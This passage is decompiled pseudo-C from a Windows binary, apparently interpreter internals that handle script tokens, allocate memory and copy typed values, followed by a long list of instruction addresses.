                                  																		__eflags = __eax;
                                  																		if(__eflags == 0) {
                                  																			_push(1);
                                  																			__eax = E004115D7(__edi, __esi, __eflags);
                                  																			__ecx =  *__esi;
                                  																			 *(__ecx + 4) = __eax;
                                  																			__edx =  *__esi;
                                  																			__eax =  *(__edx + 4);
                                  																			__esp = __esp + 4;
                                  																			 *__eax = 0;
                                  																		} else {
                                  																			_push(__eax);
                                  																			__eax = E004115D7(__edi, __esi, __eflags);
                                  																			__ecx =  *__esi;
                                  																			 *( *__esi + 4) = __eax;
                                  																			__esi =  *__esi;
                                  																			__edx =  *__esi;
                                  																			__eax =  *__edi;
                                  																			__ecx =  *( *__edi + 4);
                                  																			__esp = __esp + 4;
                                  																			__edx =  *(__esi + 4);
                                  																			__eax = E00410E60( *(__esi + 4),  *( *__edi + 4),  *__esi);
                                  																		}
                                  																		goto L108;
                                  																	case 0xa:
                                  																		_push(0x14);
                                  																		__eax = E004115D7(__edi, __esi, __eflags);
                                  																		__esp = __esp + 4;
                                  																		__eflags = __eax;
                                  																		if(__eax == 0) {
                                  																			L429:
                                  																			__eax = 0;
                                  																			L266:
                                  																			 *__esi = __eax;
                                  																			goto L108;
                                  																		}
                                  																		__ecx =  *__edi;
                                  																		__eax = E00470870(__eax,  *__edi);
                                  																		goto L266;
                                  																}
                                  															}
                                  														} else {
                                  															__eflags =  *0x4a95e4 & 0x00000001;
                                  															_v161 = 0;
                                  															if(__eflags == 0) {
                                  																 *0x4a95e4 =  *0x4a95e4 | 0x00000001;
                                  																E0044A801(0x4a95c4);
                                  																E0041130A(__eflags, 0x425c12);
                                  																_t1809 = _t1809 + 4;
                                  																_t1219 = 0;
                                  															}
                                  															 *0x4a95e0 = _t1219;
                                  															 *0x4a95dc = _t1219;
                                  															_t1269 = 0x4a95c4;
                                  															_v112 = 0x4a95c4;
                                  															while(1) {
                                  																_v140 = _t1269;
                                  																while(1) {
                                  																	L80:
                                  																	_t1270 = _t1748[1];
                                  																	_t1534 =  *_t1406;
                                  																	_t1684 =  *(_t1534 + 4);
                                  																	__eflags = _t1270;
                                  																	if(_t1270 == 0) {
                                  																		goto L386;
                                  																	}
                                  																	L81:
                                  																	__eflags = _t1684;
                                  																	if(_t1684 == 0) {
                                  																		L387:
                                  																		__eflags = _t1270;
                                  																		if(_t1270 != 0) {
                                  																			L92:
                                  																			_t1283 =  *( *_t1406 + 0x1c);
                                  																			__eflags = _t1283;
                                  																			if(_t1283 != 0) {
                                  																				_t1284 = E004431CB(_t1283, _t1748);
                                  																				_t1809 = _t1809 + 8;
                                  																				__eflags = _t1284;
                                  																				if(_t1284 == 0) {
                                  																					L399:
                                  																					 *((intOrPtr*)(_v112 + 0x1c)) =  *_t1406;
                                  																					_t1286 =  *_t1406;
                                  																					_v112 = _t1286;
                                  																					 *_t1406 =  *(_t1286 + 0x1c);
                                  																					L80:
                                  																					_t1270 = _t1748[1];
                                  																					_t1534 =  *_t1406;
                                  																					_t1684 =  *(_t1534 + 4);
                                  																					__eflags = _t1270;
                                  																					if(_t1270 == 0) {
                                  																						goto L386;
                                  																					}
                                  																					goto L81;
                                  																				}
                                  																				_t1288 =  *( *_t1406 + 0x1c);
                                  																				 *( *_t1406 + 0x1c) =  *(_t1288 + 0x18);
                                  																				 *(_t1288 + 0x18) =  *_t1406;
                                  																				 *_t1406 = _t1288;
                                  																				__eflags =  *(_t1288 + 0x1c);
                                  																				if( *(_t1288 + 0x1c) == 0) {
                                  																					goto L93;
                                  																				}
                                  																				goto L399;
                                  																			}
                                  																			L93:
                                  																			__eflags = _v161;
                                  																			 *(_v112 + 0x1c) =  *( *_t1406 + 0x18);
                                  																			 *(_v140 + 0x18) =  *( *_t1406 + 0x1c);
                                  																			_t1537 =  *0x4a95e0; // 0x0
                                  																			 *( *_t1406 + 0x18) = _t1537;
                                  																			_t1276 =  *0x4a95dc; // 0xa51b60
                                  																			 *( *_t1406 + 0x1c) = _t1276;
                                  																			if(__eflags != 0) {
                                  																				_t1408 =  *_t1406;
                                  																				__eflags =  *_t1406;
                                  																				if(__eflags == 0) {
                                  																					goto L94;
                                  																				}
                                  																				E00408E80( *((intOrPtr*)(_t1408 + 0x14)), _v204, _v204);
                                  																				goto L140;
                                  																			}
                                  																			goto L94;
                                  																		}
                                  																	}
                                  																	__eflags = _t1270 - _t1684;
                                  																	if(_t1270 < _t1684) {
                                  																		_t1290 = E0040D260( *_t1748,  *_t1534, _t1684);
                                  																		L90:
                                  																		__eflags = _t1290;
                                  																		if(__eflags < 0) {
                                  																			L393:
                                  																			_t1272 =  *( *_t1406 + 0x18);
                                  																			__eflags = _t1272;
                                  																			if(_t1272 == 0) {
                                  																				goto L93;
                                  																			}
                                  																			_t1278 = E004431CB(_t1748, _t1272);
                                  																			_t1809 = _t1809 + 8;
                                  																			__eflags = _t1278;
                                  																			if(_t1278 == 0) {
                                  																				L396:
                                  																				 *(_v140 + 0x18) =  *_t1406;
                                  																				_t1269 =  *_t1406;
                                  																				 *_t1406 =  *(_t1269 + 0x18);
                                  																				_v140 = _t1269;
                                  																				continue;
                                  																			}
                                  																			_t1281 =  *( *_t1406 + 0x18);
                                  																			 *( *_t1406 + 0x18) =  *(_t1281 + 0x1c);
                                  																			 *(_t1281 + 0x1c) =  *_t1406;
                                  																			 *_t1406 = _t1281;
                                  																			__eflags =  *(_t1281 + 0x18);
                                  																			if( *(_t1281 + 0x18) == 0) {
                                  																				goto L93;
                                  																			}
                                  																			goto L396;
                                  																		}
                                  																		if(__eflags <= 0) {
                                  																			_v161 = 1;
                                  																			goto L93;
                                  																		}
                                  																		goto L92;
                                  																	}
                                  																	__eflags = _t1270;
                                  																	if(_t1270 == 0) {
                                  																		L390:
                                  																		_t1290 = 0;
                                  																	} else {
                                  																		_t1545 =  *_t1534;
                                  																		_t1693 = _t1270;
                                  																		_t1291 =  *_t1748;
                                  																		while(1) {
                                  																			__eflags =  *_t1291 -  *_t1545;
                                  																			if(__eflags != 0) {
                                  																				break;
                                  																			}
                                  																			_t1291 = _t1291 + 2;
                                  																			_t1545 = _t1545 + 2;
                                  																			_t1693 = _t1693 - 1;
                                  																			__eflags = _t1693;
                                  																			if(_t1693 != 0) {
                                  																				continue;
                                  																			} else {
                                  																				_t1406 = _v208;
                                  																				goto L390;
                                  																			}
                                  																		}
                                  																		_t1406 = _v208;
                                  																		if(__eflags < 0) {
                                  																			_t1290 = _t1291 | 0xffffffff;
                                  																		} else {
                                  																			_t1290 = 1;
                                  																		}
                                  																	}
                                  																	goto L90;
                                  																	L386:
                                  																	__eflags = _t1684;
                                  																	if(_t1684 != 0) {
                                  																		goto L393;
                                  																	}
                                  																	goto L387;
                                  																}
                                  															}
                                  														}
                                  														L371:
                                  														_t1740 =  *( *_t1652);
                                  														__eflags = _t1740 - 0x24;
                                  														if(_t1740 == 0x24) {
                                  															L374:
                                  															_t1778 = _t1778 + 1;
                                  															_t1652 = _t1652 + 4;
                                  															__eflags = _t1652;
                                  															goto L375;
                                  														}
                                  														__eflags = _t1740 - 0x1e;
                                  														if(_t1740 != 0x1e) {
                                  															goto L375;
                                  														}
                                  														_v208 = 0x100;
                                  														_t1177 = _v208;
                                  														goto L374;
                                  													}
                                  												} else {
                                  													_v212 = 3;
                                  													_v108 = _t1444;
                                  													while(1) {
                                  														__eflags = _t1611 - _v208;
                                  														if(_t1611 >= _v208) {
                                  															goto L57;
                                  														}
                                  														_v116 = _v116 + 1;
                                  														_t1308 =  *(_v148 + 4) + _v212 * 4;
                                  														_t1559 =  *_t1308;
                                  														_t1728 = 0;
                                  														_t1411 = 0;
                                  														__eflags =  *(_t1559 + 8);
                                  														if( *(_t1559 + 8) == 0) {
                                  															do {
                                  																_t1561 =  *((intOrPtr*)( *_t1308));
                                  																__eflags = _t1561 - 0x24;
                                  																if(_t1561 != 0x24) {
                                  																	__eflags = _t1561 - 0x1e;
                                  																	if(_t1561 != 0x1e) {
                                  																		_push(0xffffffff);
                                  																		_push(0x91);
                                  																		L623:
                                  																		_push(_a4);
                                  																		goto L624;
                                  																	}
                                  																	_t1728 = 0x100;
                                  																	goto L301;
                                  																}
                                  																_t1411 = 1;
                                  																L301:
                                  																_t1562 =  *((intOrPtr*)(_t1308 + 4));
                                  																_v212 = _v212 + 1;
                                  																_t1308 = _t1308 + 4;
                                  																__eflags =  *((short*)(_t1562 + 8));
                                  															} while ( *((short*)(_t1562 + 8)) == 0);
                                  														}
                                  														_t1697 =  *((intOrPtr*)( *((intOrPtr*)(_a8 + 4)) + _t1611 * 4));
                                  														__eflags =  *((short*)(_t1697 + 8)) - 0x33;
                                  														if( *((short*)(_t1697 + 8)) != 0x33) {
                                  															_t1411 = 0;
                                  															__eflags = 0;
                                  														}
                                  														_t1791 = _v124;
                                  														_t1310 = _v120;
                                  														__eflags = _t1791 - _t1310;
                                  														if(__eflags == 0) {
                                  															_t1311 = _t1310 + _t1310;
                                  															__eflags = _t1311 - 4;
                                  															if(__eflags < 0) {
                                  																_t1311 = 4;
                                  															}
                                  															_v120 = _t1311;
                                  															_push( ~(0 | __eflags > 0x00000000) | _t1311 * 0x00000004);
                                  															_v156 = E004115D7(_t1728, _t1791, __eflags);
                                  															E00410E60(_t1313, _v128, _t1791 * 4);
                                  															_push(_v128);
                                  															E004111DC();
                                  															_t1809 = _t1809 + 0x14;
                                  															_v128 = _v156;
                                  														}
                                  														_push(1);
                                  														_t1317 = E004115D7(_t1728, _t1791, __eflags);
                                  														_t1809 = _t1809 + 4;
                                  														__eflags = _t1317;
                                  														if(_t1317 == 0) {
                                  															_t1317 = 0;
                                  														} else {
                                  															 *_t1317 = _t1411;
                                  														}
                                  														 *(_v128 + _t1791 * 4) = _t1317;
                                  														_t1792 = _t1791 + 1;
                                  														_v124 = _t1791 + 1;
                                  														__eflags = _t1411;
                                  														if(_t1411 != 0) {
                                  															_t1570 = _v144;
                                  															_t1319 =  *((intOrPtr*)( *((intOrPtr*)(_a8 + 4)) + _t1570 * 4));
                                  															__eflags =  *((short*)(_t1319 + 8)) - 0x33;
                                  															if( *((short*)(_t1319 + 8)) != 0x33) {
                                  																_push( *((short*)( *((intOrPtr*)( *((intOrPtr*)(_a8 + 4)) + _t1570 * 4)) + 0xa)));
                                  																_push(0x91);
                                  																_push(_a4);
                                  																goto L624;
                                  															}
                                  															_t1573 = 0;
                                  															_t1322 = E0040C2C0(0,  *_t1319,  &_v200,  &_v204);
                                  															__eflags = _t1322;
                                  															if(_t1322 == 0) {
                                  																_push( *((short*)( *((intOrPtr*)( *((intOrPtr*)(_a8 + 4)) + _v144 * 4)) + 0xa)));
                                  																_push(0x79);
                                  																_push(_a4);
                                  																goto L624;
                                  															}
                                  															__eflags = _v204 & 0x00000100;
                                  															if((_v204 & 0x00000100) == 0) {
                                  																L309:
                                  																_t1325 = _v200;
                                  																_t1728 = 1;
                                  																_v144 = _v144 + 1;
                                  																_v212 = _v212 + 1;
                                  																__eflags =  *((intOrPtr*)(_t1325 + 8)) - 5;
                                  																if( *((intOrPtr*)(_t1325 + 8)) != 5) {
                                  																	L313:
                                  																	E00408F40(_t1728,  &_v196);
                                  																	_v188 = 6;
                                  																	_v196 = _v200;
                                  																	E0040BA10(_t1411, _t1573, _t1728,  &_v180,  &_v196);
                                  																	_t1412 = _v212;
                                  																	goto L51;
                                  																}
                                  																_t1573 = _a8;
                                  																_t1710 =  *((intOrPtr*)( *((intOrPtr*)(_a8 + 4)) + _v144 * 4));
                                  																__eflags =  *((short*)(_t1710 + 8)) - 0x4e;
                                  																if( *((short*)(_t1710 + 8)) != 0x4e) {
                                  																	goto L313;
                                  																}
                                  																_t1341 = E0040C4E0( &_v144, _t1573, _t1851, _a4,  &_v200, 0);
                                  																__eflags = _t1341;
                                  																if(_t1341 == 0) {
                                  																	goto L313;
                                  																}
                                  																E00408F40(1,  &_v196);
                                  																E00430E4D( &_v132);
                                  																E00410C60( &_v180, 1);
                                  																_t946 = 1;
                                  																goto L264;
                                  															}
                                  															__eflags = _t1728 & 0x00000100;
                                  															if((_t1728 & 0x00000100) != 0) {
                                  																goto L309;
                                  															}
                                  															_push( *((short*)( *((intOrPtr*)( *((intOrPtr*)(_a8 + 4)) + _v144 * 4)) + 0xa)));
                                  															_push(0xb0);
                                  															_push(_a4);
                                  															goto L624;
                                  														} else {
                                  															_t1347 = _v184;
                                  															__eflags = _t1347;
                                  															if(_t1347 != 0) {
                                  																E004431AD(_t1347);
                                  																_v188 = 0;
                                  															}
                                  															_t1349 = _v188;
                                  															__eflags = _t1349 - 8;
                                  															if(_t1349 == 8) {
                                  																_t1350 = _v196;
                                  																__eflags = _t1350;
                                  																if(_t1350 != 0) {
                                  																	__imp__#9(_t1350);
                                  																	_push(_v200);
                                  																	E004111DC();
                                  																	_t1809 = _t1809 + 4;
                                  																}
                                  															} else {
                                  																__eflags = _t1349 - 0xa;
                                  																if(_t1349 == 0xa) {
                                  																	_t1369 = _v196;
                                  																	__eflags = _t1369;
                                  																	if(_t1369 != 0) {
                                  																		E0044318E(_t1369);
                                  																	}
                                  																} else {
                                  																	__eflags = _t1349 - 5;
                                  																	if(_t1349 == 5) {
                                  																		E0040E270( &_v196, _t1792);
                                  																	} else {
                                  																		__eflags = _t1349 - 0xb;
                                  																		if(_t1349 == 0xb) {
                                  																			_push( *(_v196 + 4));
                                  																			E004111DC();
                                  																			_push(_v196);
                                  																			E004111DC();
                                  																			_t1809 = _t1809 + 8;
                                  																		} else {
                                  																			__eflags = _t1349 - 0xc;
                                  																			if(_t1349 == 0xc) {
                                  																				_t1376 = _v196;
                                  																				__eflags = _t1376;
                                  																				if(_t1376 != 0) {
                                  																					E0044B3D9(_t1376);
                                  																				}
                                  																			}
                                  																		}
                                  																	}
                                  																}
                                  															}
                                  															_t1799 = _v172;
                                  															_t1351 = _v168;
                                  															_v188 = 1;
                                  															_v196 = 0;
                                  															__eflags = _t1799 - _t1351;
                                  															if(__eflags == 0) {
                                  																_t1352 = _t1351 + _t1351;
                                  																__eflags = _t1352 - 4;
                                  																if(__eflags < 0) {
                                  																	_t1352 = 4;
                                  																}
                                  																_v168 = _t1352;
                                  																_push( ~(0 | __eflags > 0x00000000) | _t1352 * 0x00000004);
                                  																_t1354 = E004115D7(_t1728, _t1799, __eflags);
                                  																_t1413 = _v176;
                                  																_t1755 = _t1354;
                                  																E00410E60(_t1755, _t1413, _t1799 * 4);
                                  																_push(_t1413);
                                  																E004111DC();
                                  																_t1809 = _t1809 + 0x14;
                                  																_v176 = _t1755;
                                  															}
                                  															_t1728 = _v176;
                                  															_push(0x10);
                                  															_t1358 = E004115D7(_t1728, _t1799, __eflags);
                                  															_t1809 = _t1809 + 4;
                                  															__eflags = _t1358;
                                  															if(_t1358 == 0) {
                                  																_t1359 = 0;
                                  																L49:
                                  																_t1412 = _v208;
                                  																 *(_t1728 + _t1799 * 4) = _t1359;
                                  																_v172 = _t1799 + 1;
                                  																_t1361 = E0040A780(_a4, _t1851, _a8,  &_v144,  *((intOrPtr*)(_t1728 + (_t1799 + 1) * 4 - 4)), _t1412);
                                  																__eflags = _t1361;
                                  																if(_t1361 != 0) {
                                  																	L625:
                                  																	E00408F40(_t1728,  &_v196);
                                  																	E00430E4D( &_v132);
                                  																	E00410C60( &_v180, _t1728);
                                  																	_t946 = 1;
                                  																	goto L264;
                                  																} else {
                                  																	_t1362 = _v212;
                                  																	_t1717 =  *((intOrPtr*)( *(_v148 + 4) + 4 + _t1362 * 4));
                                  																	__eflags =  *((short*)(_t1717 + 8)) - 0x41;
                                  																	_v212 = _t1362 + 1;
                                  																	if( *((short*)(_t1717 + 8)) == 0x41) {
                                  																		_v212 = _v212 + 2;
                                  																	}
                                  																	L51:
                                  																	_t1611 = _v144;
                                  																	__eflags = _t1611 - _t1412;
                                  																	if(_t1611 == _t1412) {
                                  																		goto L57;
                                  																	}
                                  																	_t1796 = _a8;
                                  																	_t1330 =  *((intOrPtr*)( *((intOrPtr*)(_t1796 + 4)) + _t1611 * 4));
                                  																	__eflags =  *((intOrPtr*)(_t1330 + 8)) - 0x40;
                                  																	if( *((intOrPtr*)(_t1330 + 8)) != 0x40) {
                                  																		L354:
                                  																		_push( *((short*)( *((intOrPtr*)( *((intOrPtr*)(_t1796 + 4)) + _t1611 * 4)) + 0xa)));
                                  																		_push(0x6f);
                                  																		goto L623;
                                  																	}
                                  																	_t1332 = _t1611 + 1;
                                  																	__eflags = _t1332 - _v208;
                                  																	if(_t1332 == _v208) {
                                  																		goto L354;
                                  																	} else {
                                  																		_t1611 = _t1332;
                                  																		_v144 = _t1611;
                                  																		_t1335 =  *((intOrPtr*)( *(_v148 + 4) + _v212 * 4));
                                  																		__eflags =  *((intOrPtr*)(_t1335 + 8)) - 0x40;
                                  																		if( *((intOrPtr*)(_t1335 + 8)) == 0x40) {
                                  																			_t139 =  &_v212;
                                  																			 *_t139 = _v212 + 1;
                                  																			__eflags =  *_t139;
                                  																		}
                                  																		_t1337 = _v108 + 1;
                                  																		_v108 = _t1337;
                                  																		__eflags = _t1337 - _v136;
                                  																		if(_t1337 < _v136) {
                                  																			continue;
                                  																		}
                                  																		goto L57;
                                  																	}
                                  																}
                                  															}
                                  															_t1414 = _t1358;
                                  															_t1364 = _v188;
                                  															 *(_t1414 + 8) = _t1364;
                                  															 *(_t1414 + 0xc) = 0;
                                  															__eflags = _t1364 - 1;
                                  															if(_t1364 != 1) {
                                  																_t1365 = _t1364 - 1;
                                  																__eflags = _t1365 - 0xb;
                                  																if(__eflags > 0) {
                                  																	L336:
                                  																	_t1728 = _v176;
                                  																	_t1799 = _v172;
                                  																	L48:
                                  																	_t1359 = _t1414;
                                  																	goto L49;
                                  																}
                                  																switch( *((intOrPtr*)(_t1365 * 4 +  &M0042AEAE))) {
                                  																	case 0:
                                  																		goto L47;
                                  																	case 1:
                                  																		__eax = _v196;
                                  																		 *__ebx = _v196;
                                  																		__ecx = _v192;
                                  																		__ebx[1] = __ecx;
                                  																		goto L48;
                                  																	case 2:
                                  																		__fp0 = _v196;
                                  																		 *__ebx = __fp0;
                                  																		goto L48;
                                  																	case 3:
                                  																		_push(0x10);
                                  																		_t1366 = E004115D7(_t1728, _t1799, __eflags);
                                  																		_t1809 = _t1809 + 4;
                                  																		__eflags = _t1366;
                                  																		if(_t1366 == 0) {
                                  																			 *(_t1414 + 0xc) = 0;
                                  																		} else {
                                  																			_t1589 = _v184;
                                  																			 *_t1366 =  *_t1589;
                                  																			 *((intOrPtr*)(_t1366 + 4)) =  *((intOrPtr*)(_t1589 + 4));
                                  																			 *((intOrPtr*)(_t1366 + 8)) =  *((intOrPtr*)(_t1589 + 8));
                                  																			_t1590 =  *((intOrPtr*)(_t1589 + 0xc));
                                  																			 *((intOrPtr*)(_t1366 + 0xc)) = _t1590;
                                  																			 *_t1590 =  *_t1590 + 1;
                                  																			 *(_t1414 + 0xc) = _t1366;
                                  																		}
                                  																		goto L48;
                                  																	case 4:
                                  																		_push(0x214);
                                  																		__eax = E004115D7(__edi, __esi, __eflags);
                                  																		__esp = __esp + 4;
                                  																		__eflags = __eax;
                                  																		if(__eax == 0) {
                                  																			__eax = 0;
                                  																			__eflags = 0;
                                  																		} else {
                                  																			__esi = _v196;
                                  																			__ecx = 0x85;
                                  																			__edi = __eax;
                                  																			__eax = memcpy(__eax, __esi, 0x85 << 2);
                                  																			__edi = __esi + __ecx;
                                  																			__edi = __esi + __ecx + __ecx;
                                  																			__ecx = 0;
                                  																		}
                                  																		 *__ebx = __eax;
                                  																		__eflags =  *(__eax + 4);
                                  																		if( *(__eax + 4) != 0) {
                                  																			__eax =  *(__eax + 4);
                                  																			 *__eax =  *__eax + 1;
                                  																			__eflags =  *__eax;
                                  																		}
                                  																		goto L336;
                                  																	case 5:
                                  																		__eax = _v196;
                                  																		 *__ebx = _v196;
                                  																		goto L48;
                                  																	case 6:
                                  																		__eflags = _v196;
                                  																		if(__eflags == 0) {
                                  																			goto L336;
                                  																		}
                                  																		_push(0x10);
                                  																		__eax = E004115D7(__edi, __esi, __eflags);
                                  																		__esp = __esp + 4;
                                  																		_push(__eax);
                                  																		 *__ebx = __eax;
                                  																		__imp__#8();
                                  																		__ecx = _v200;
                                  																		__edx =  *__ebx;
                                  																		_push(__ecx);
                                  																		_push( *__ebx);
                                  																		__imp__#10();
                                  																		__eflags = __eax;
                                  																		if(__eax < 0) {
                                  																			__eax =  *__ebx;
                                  																			_push( *__ebx);
                                  																			__imp__#9();
                                  																			__ecx =  *__ebx;
                                  																			_push( *__ebx);
                                  																			__eax = E004111DC();
                                  																			__esp = __esp + 4;
                                  																			 *__ebx = 0;
                                  																		}
                                  																		goto L48;
                                  																	case 7:
                                  																		 *__ebx = _v196;
                                  																		goto L48;
                                  																	case 8:
                                  																		_push(0x18);
                                  																		__eax = E004115D7(__edi, __esi, __eflags);
                                  																		__esp = __esp + 4;
                                  																		__eflags = __eax;
                                  																		if(__eax == 0) {
                                  																			goto L343;
                                  																		}
                                  																		__ecx = _v196;
                                  																		 *__ebx = __eax;
                                  																		goto L48;
                                  																	case 9:
                                  																		_push(8);
                                  																		__eax = E004115D7(__edi, __esi, __eflags);
                                  																		 *__ebx = __eax;
                                  																		__edx = _v196;
                                  																		__ecx =  *_v196;
                                  																		 *__eax =  *_v196;
                                  																		__edx =  *__ebx;
                                  																		__eax =  *( *__ebx);
                                  																		__esp = __esp + 4;
                                  																		__eflags = __eax;
                                  																		if(__eflags == 0) {
                                  																			_push(1);
                                  																			__eax = E004115D7(__edi, __esi, __eflags);
                                  																			__ecx =  *__ebx;
                                  																			 *(__ecx + 4) = __eax;
                                  																			__edx =  *__ebx;
                                  																			__eax =  *(__edx + 4);
                                  																			__esp = __esp + 4;
                                  																			 *( *(__edx + 4)) = 0;
                                  																		} else {
                                  																			_push(__eax);
                                  																			__eax = E004115D7(__edi, __esi, __eflags);
                                  																			__ecx =  *__ebx;
                                  																			 *( *__ebx + 4) = __eax;
                                  																			__eax =  *__ebx;
                                  																			__edx =  *__eax;
                                  																			__ecx = _v196;
                                  																			__eax =  *(__eax + 4);
                                  																			__esp = __esp + 4;
                                  																			__edx =  *(_v196 + 4);
                                  																			__eax = E00410E60(__eax,  *(_v196 + 4),  *(_v196 + 4));
                                  																		}
                                  																		goto L48;
                                  																	case 0xa:
                                  																		_push(0x14);
                                  																		__eax = E004115D7(__edi, __esi, __eflags);
                                  																		__esp = __esp + 4;
                                  																		__eflags = __eax;
                                  																		if(__eax == 0) {
                                  																			L343:
                                  																			__eax = 0;
                                  																			 *__ebx = 0;
                                  																			goto L48;
                                  																		}
                                  																		__ecx = _v196;
                                  																		 *__ebx = __eax;
                                  																		goto L48;
                                  																}
                                  															}
                                  															L47:
                                  															 *_t1414 = _v196;
                                  															goto L48;
                                  														}
                                  													}
                                  													goto L57;
                                  												}
                                  											}
                                  											__eflags = _t978 - _t1444;
                                  											if(_t978 <= _t1444) {
                                  												goto L296;
                                  											} else {
                                  												_t1379 = (_t978 << 4) +  *0x4a912c;
                                  												__eflags = _t1379;
                                  												_v148 = _t1379;
                                  												goto L28;
                                  											}
                                  										}
                                  									}
                                  								}
                                  								_t1593 = _v200 + 1;
                                  								__eflags = _t1593;
                                  								_v136 = _t1593;
                                  								goto L287;
                                  							}
                                  							_v116 = _v200 - 1;
                                  							L287:
                                  							__eflags = _v136 - _v116;
                                  						} while (_v136 <= _v116);
                                  						goto L288;
                                  					}
                                  					_t1763 =  *(_t956 + 0x134);
                                  					if(_t1763 != 0) {
                                  						_v200 = _t1763;
                                  						do {
                                  							_t1725 =  *((intOrPtr*)(_t1763 + 4));
                                  							if(_t1725 != _v176) {
                                  								goto L268;
                                  							}
                                  							if(_t1725 == 0) {
                                  								L15:
                                  								_t1382 = _v168;
                                  								 *_t1382 =  *_t1382 - 1;
                                  								if( *_t1382 == 0) {
                                  									_push(_v180);
                                  									E004111DC();
                                  									_push(_v168);
                                  									E004111DC();
                                  									_t1809 = _t1809 + 8;
                                  								}
                                  								goto L17;
                                  							} else {
                                  								_t1595 = _v180;
                                  								_t1385 =  *_t1763;
                                  								L12:
                                  								L12:
                                  								if( *_t1385 !=  *_t1595) {
                                  									_t1763 = _v200;
                                  								} else {
                                  									goto L13;
                                  								}
                                  								goto L268;
                                  								L13:
                                  								_t1385 = _t1385 + 2;
                                  								_t1595 =  &(_t1595[1]);
                                  								_t1725 = _t1725 - 1;
                                  								if(_t1725 != 0) {
                                  									goto L12;
                                  								} else {
                                  									_t1763 = _v200;
                                  									goto L15;
                                  								}
                                  							}
                                  							L268:
                                  							_t1763 =  *(_t1763 + 0x20);
                                  							_v200 = _t1763;
                                  							__eflags = _t1763;
                                  						} while (__eflags != 0);
                                  					}
                                  					goto L288;
                                  				}
                                  			}
                                  0x0040a4bd
                                  0x0040a4c4
                                  0x0040a4c6
                                  0x0042abb0
                                  0x0042abb5
                                  0x0042abb5
                                  0x0040a4cc
                                  0x0040a4d3
                                  0x0040a4d6
                                  0x0042abc5
                                  0x0042abcc
                                  0x0042abce
                                  0x0042abd4
                                  0x0042abd5
                                  0x0042abdb
                                  0x0042abdc
                                  0x0042abe1
                                  0x0042abe1
                                  0x0040a4dc
                                  0x0040a4dc
                                  0x0040a4df
                                  0x0042abe9
                                  0x0042abf0
                                  0x0042abf2
                                  0x0042abf9
                                  0x0042abf9
                                  0x0040a4e5
                                  0x0040a4e5
                                  0x0040a4e8
                                  0x0042ac0a
                                  0x0040a4ee
                                  0x0040a4ee
                                  0x0040a4f1
                                  0x0042ac14
                                  0x0042ac1e
                                  0x0042ac1f
                                  0x0042ac27
                                  0x0042ac28
                                  0x0042ac2d
                                  0x0040a4f7
                                  0x0040a4f7
                                  0x0040a4fa
                                  0x0042ac35
                                  0x0042ac3c
                                  0x0042ac3e
                                  0x0042ac45
                                  0x0042ac45
                                  0x0042ac3e
                                  0x0040a4fa
                                  0x0040a4f1
                                  0x0040a4e8
                                  0x0040a4df
                                  0x0040a500
                                  0x0040a507
                                  0x0040a50e
                                  0x0040a515
                                  0x0040a51c
                                  0x0040a523
                                  0x0040a525
                                  0x0042ac50
                                  0x0042ac55
                                  0x0042ac60
                                  0x0042ac65
                                  0x0042ac65
                                  0x0040a52b
                                  0x0040a52e
                                  0x0042ac6c
                                  0x0042ac73
                                  0x0042ac79
                                  0x0042ac80
                                  0x0042ac81
                                  0x0042ac87
                                  0x0042ac88
                                  0x0042ac8d
                                  0x0042ac90
                                  0x0042ac95
                                  0x0042ac95
                                  0x0040a534
                                  0x0040a534
                                  0x0040a537
                                  0x0042ac9c
                                  0x0042aca3
                                  0x0042acb1
                                  0x0042acb6
                                  0x0042acbb
                                  0x0042acbb
                                  0x0040a53d
                                  0x0040a53d
                                  0x0040a540
                                  0x0042acc9
                                  0x0042acce
                                  0x0042acd3
                                  0x0040a546
                                  0x0040a546
                                  0x0040a549
                                  0x0042acda
                                  0x0042ace4
                                  0x0042ace5
                                  0x0042aced
                                  0x0042acee
                                  0x0042acf3
                                  0x0042acf6
                                  0x0042acfb
                                  0x0040a54f
                                  0x0040a54f
                                  0x0040a552
                                  0x0042ad02
                                  0x0042ad09
                                  0x0042ad17
                                  0x0042ad1c
                                  0x0042ad21
                                  0x0042ad21
                                  0x0042ad09
                                  0x0040a552
                                  0x0040a549
                                  0x0040a540
                                  0x0040a537
                                  0x0040a558
                                  0x0040a55c
                                  0x0040a55e
                                  0x0042ad29
                                  0x0042ad2e
                                  0x0042ad36
                                  0x0042ad3b
                                  0x0042ad3b
                                  0x0040a564
                                  0x0040a568
                                  0x0040a56b
                                  0x0042ad42
                                  0x0042ad46
                                  0x0042ad48
                                  0x0042ad4e
                                  0x0042ad4f
                                  0x0042ad59
                                  0x0042ad5a
                                  0x0042ad5f
                                  0x0042ad62
                                  0x0042ad67
                                  0x0042ad67
                                  0x0040a571
                                  0x0040a571
                                  0x0040a574
                                  0x0042ad6e
                                  0x0042ad72
                                  0x0042ad74
                                  0x0042ad7b
                                  0x0042ad80
                                  0x0042ad85
                                  0x0042ad85
                                  0x0040a57a
                                  0x0040a57a
                                  0x0040a57d
                                  0x0042ad90
                                  0x0042ad95
                                  0x0042ad9a
                                  0x0040a583
                                  0x0040a583
                                  0x0040a586
                                  0x0042ada8
                                  0x0042ada9
                                  0x0042adb5
                                  0x0042adb6
                                  0x0042adbb
                                  0x0042adbe
                                  0x0042adc3
                                  0x0040a58c
                                  0x0040a58c
                                  0x0040a58f
                                  0x0042adca
                                  0x0042adce
                                  0x0042add0
                                  0x0042add7
                                  0x0042addc
                                  0x0042ade1
                                  0x0042ade1
                                  0x0042add0
                                  0x0040a58f
                                  0x0040a586
                                  0x0040a57d
                                  0x0040a574
                                  0x0040a595
                                  0x0040a599
                                  0x0040a59d
                                  0x0040a59f
                                  0x0040a5b4
                                  0x0040a5b8
                                  0x0040a5b9
                                  0x0040a5be
                                  0x0040a5c1
                                  0x0040a5c6
                                  0x0040a650
                                  0x0040a654
                                  0x0040a655
                                  0x0040a65d
                                  0x0040a65d
                                  0x00000000
                                  0x0040a5cc
                                  0x0040a5cc
                                  0x0040a5cc
                                  0x0040a5d0
                                  0x0040a5d4
                                  0x0040a5d7
                                  0x0040a5d9
                                  0x00000000
                                  0x00000000
                                  0x0040a5db
                                  0x0040a5de
                                  0x0040a5e0
                                  0x0040a5e5
                                  0x0040a5ea
                                  0x0040a5ed
                                  0x0042adea
                                  0x0042adeb
                                  0x0042adf6
                                  0x0042adf7
                                  0x0042adfc
                                  0x0042adfc
                                  0x0040a5f3
                                  0x0040a5f4
                                  0x0040a5f9
                                  0x0040a5fc
                                  0x0040a5fc
                                  0x0040a603
                                  0x0040a606
                                  0x0040a609
                                  0x0042ae04
                                  0x0042ae06
                                  0x0042ae08
                                  0x00000000
